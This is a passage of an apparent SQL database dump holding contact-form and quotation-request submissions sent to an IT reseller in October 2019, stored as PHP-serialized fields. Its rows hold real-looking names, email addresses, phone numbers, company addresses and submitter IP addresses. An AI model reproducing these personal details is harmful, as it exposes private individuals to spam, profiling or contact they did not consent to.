Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-08 00:09:00','202.190.21.148','1'),(326,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"rizal b che kar\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"ronazsolution@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162053467\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"RONAZ BUSINESS SOLUTION SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:51:\"req price for jabra headset model 1513-0157-hsc-023\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"30\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-08 09:55:50','124.13.202.179','1'),(327,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Zul Sham\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"therealzulsham@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60182742895\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Joey Yap Consulting Group Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:134:\"Hello. I am looking for a video conferencing to be install in my office in KL. Could you text me more about the details please. Thanks\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"96\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-08 11:23:21','115.134.24.180','1'),(328,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"NGUYEN Thi Bich Ngoc\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"nnguyen9@mantu.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"+84 28 7300 1398\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Amaris Consulting Pvt Ltd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:71:\"We need quotation for Wifi/ 3G/ LTE Dongle, to use together with 3G Sim\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"01\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-08 17:54:16','27.68.135.186','1'),(329,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Aaron Joshua\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"aaron.joshua@klaesb.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0149008570\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"KL Automation Engineering Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Send Quotation\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"14\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-09 12:05:10','219.92.39.157','1'),(330,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"kamal\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"kamal@terengganu-inc.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"096177771\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"terengganu inc\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:45:\"wisma ti, chendering, 20000 kuala terengganu.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Logitech Group, Logitech Rally, Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"19\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-10 14:13:26','210.186.145.89','1'),(331,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Clement Wong\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"mr.clementwong@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"128176001\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"Ppk\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"Sibu\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"TOUGHBOOK 54, TOUGHPAD FZ-G1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"46\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-11 06:42:04','183.171.113.73','1'),(332,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Hafizan Embong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"hafizan.embong@tieto.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"016-2529502\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Tieto Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:121:\"I would like to request for quotations for this product, preferably with and without the extra microphone set. Thank you.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"51\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-11 09:55:55','202.129.163.62','1'),(333,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Jeremy Lee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"jeremylee@ccsmy.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60123071979\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Catalyst Commerce systems\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Logitech MeetUp, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Looking for quote on these 